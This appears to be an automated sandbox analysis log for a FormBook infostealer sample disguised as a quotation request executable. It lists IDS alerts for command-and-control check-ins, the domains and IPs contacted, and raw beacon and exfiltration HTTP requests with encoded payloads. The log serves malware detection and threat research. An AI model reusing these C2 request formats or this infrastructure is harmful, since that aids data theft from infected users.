            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 34.92.248.216:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 15.197.225.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 34.92.248.216:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 15.197.225.128:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 45.56.219.238:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50050 -> 45.56.219.238:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 45.56.219.238:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 15.197.225.128:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 45.56.219.238:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 34.92.248.216:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50046 -> 34.92.248.216:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 34.92.248.216:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 45.56.219.238:80
            Source: Joe Sandbox ViewIP Address: 15.197.225.128 15.197.225.128
            Source: Joe Sandbox ViewIP Address: 15.197.225.128 15.197.225.128
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TANDEMUS TANDEMUS
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49736
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\URGENT REQUEST FOR QUOTATION.exeCode function: 0_2_000ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_000ACE44
            Source: global trafficHTTP traffic detected: GET /ezjb/?InQ=l3Sp86LdHQK51JyL57ZHZ2codxeMI4L2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIR1r1RIPPBE5LFNr96UmDzREVcd4mJJ6hoQo=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bqberw.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /0fox/?InQ=4CzKvyikl1JmGr8xOweoExseK3jSsW+NmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwPvDloADmDN4KAHnmSf5T9qbzaKMNsg1yiE4=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.weatherbook.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /9apq/?InQ=LHjDDAx19xzpDFr7DCXHGx3Itg+TAVeOcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3icgk1As8EJsNFlQOYCfqBIjmoJeJzbnATgI=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cc101.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /66j2/?4b0dM=fDYPF&InQ=HppDh2G+RtpfmDCc4FqHfw3lMYrNZu7sBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpROVjuIMxlXfhlP5y3R3WlUeQ7oHwEkw80jU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dverkom.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /8y34/?InQ=XU1sh1XtMideJdcjjw9tv1ce3F6q0wR2gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iOxsMANTT8niAScqb+QYTNo3dZz3Qq1EvsPg=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.crowsecurity.cloudConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /kdfx/?4b0dM=fDYPF&InQ=eNDgnj/WfiIi0tdhycbCw+iXO8euh2ZcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZW0B0X+kPjhgk6HpPnQraaSGImvIvXcettGI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.multileveltravel.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /ghvt/?InQ=LTjEQRzJtYpWLPC0PWhno4Odjb6ancq35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4ns4hEFcPU5cg3ajV68ZqrtcUBFUChNwT6XQ=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.technectar.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /l8vr/?4b0dM=fDYPF&InQ=GUwa608LSzm8fYtTR+SEUVhxn7QWXd8p00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlRP3KaSMB9eKJFRSf7ydL9xHq5BCglnMKa3Y= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /5hcm/?InQ=tP3kAkfnE7i1YCC4WEIWdKvNUvpS22y5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUkjVwGn+C/bAHUZtb03BGjpac+p+rsaDZJI6Y=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bayarcepat19.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /ka9h/?InQ=SBEzZAFI6R+MuXMHep45hveg8475zASMotQq88crLJjLaeo0XbFH+bdZbQqsHZwXBgGMZiEh6f1TBI/WO30Y7KSm1k/3EoEdIY5bKrw0daRcPqXkB0ATUTg=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.queima.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /a0tq/?InQ=NgVUtP9hB7Edi5xskNDunaeCW7f91G+gHsaEhqzqxE1iqkI06nxaFE271iDw3agr7prg6niclQPaHXiPhdgPCPpSuEPqLxH/sZvl8OJdgUd2EHHS19jqltw=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rjscorp.orgConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /ukg6/?InQ=D9wM5xDL/q3TI2g2vD4UiiybpTRhluIicjQPF53/huNm+8guGd31VA7hAVYl0bGFbVNx83u8duJjtMB4AC+GThc54L4vcaEMqaTD3FORm4ZRpAFMFX0j2sk=&4b0dM=fDYPF HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.thegardenlab.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /cqvc/?4b0dM=fDYPF&InQ=x6i2VaY/COe6YJbCm7hgmslThhj3HERMoqMF/kViJh7LTEfNCvLkasLfb6R400f5ycdhyFaSyEdZONyfMQ03m7/g21IBXRRsU6NOr6wuD6OEnaTkSZEbttE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.technew.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficDNS traffic detected: DNS query: www.dxeg.lol
            Source: global trafficDNS traffic detected: DNS query: www.bqberw.vip
            Source: global trafficDNS traffic detected: DNS query: www.weatherbook.live
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
            Source: global trafficDNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
            Source: global trafficDNS traffic detected: DNS query: www.technectar.top
            Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
            Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
            Source: global trafficDNS traffic detected: DNS query: www.queima.shop
            Source: global trafficDNS traffic detected: DNS query: www.rjscorp.org
            Source: global trafficDNS traffic detected: DNS query: www.thegardenlab.net
            Source: global trafficDNS traffic detected: DNS query: www.timetime.store
            Source: global trafficDNS traffic detected: DNS query: www.technew.shop
            Source: unknownHTTP traffic detected: POST /0fox/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.weatherbook.liveOrigin: http://www.weatherbook.liveReferer: http://www.weatherbook.live/0fox/Content-Length: 200Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)Data Raw: 49 6e 51 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 61 4d 45 49 6d 4c 64 52 6a 5a 35 44 56 37 42 77 57 69 49 76 30 54 7a 4a 31 57 42 74 79 76 46 33 7a 45 41 45 73 32 63 6b 43 46 58 4f 33 74 78 2b 57 6e 32 47 4a 2f 51 37 38 4c 50 45 6b 46 4f 57 56 2b 30 61 79 4a 54 41 73 33 68 6c 52 44 36 65 4e 63 4e 63 45 71 6f 62 2f 56 6d 68 2f 4c 2f 53 37 49 49 73 51 31 30 76 58 76 6d 64 70 6d 71 35 69 66 6d 34 4a 37 37 70 39 4e 5a 74 6e 54 42 73 53 5a 64 6f 2b 63 78 55 30 6a 37 4e 51 73 74 66 73 68 50 37 75 30 6e 78 32 6d 4d 35 7a 69 57 54 58 37 44 56 65 4e 31 66 76 66 37 61 61 68 67 54 47 39 75 33 51 3d 3d Data Ascii: InQ=1AbqsGSWvjVHPaMEImLdRjZ5DV7BwWiIv0TzJ1WBtyvF3zEAEs2ckCFXO3tx+Wn2GJ/Q78LPEkFOWV+0ayJTAs3hlRD6eNcNcEqob/Vmh/L/S7IIsQ10vXvmdpmq5ifm4J77p9NZtnTBsSZdo+cxU0j7NQstfshP7u0nx2mM5ziWTX7DVeN1fvf7aahgTG9u3Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 18:59:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 18:59:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 18:59:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 02 Nov 2024 18:59:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Nov 2024 19:00:26 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 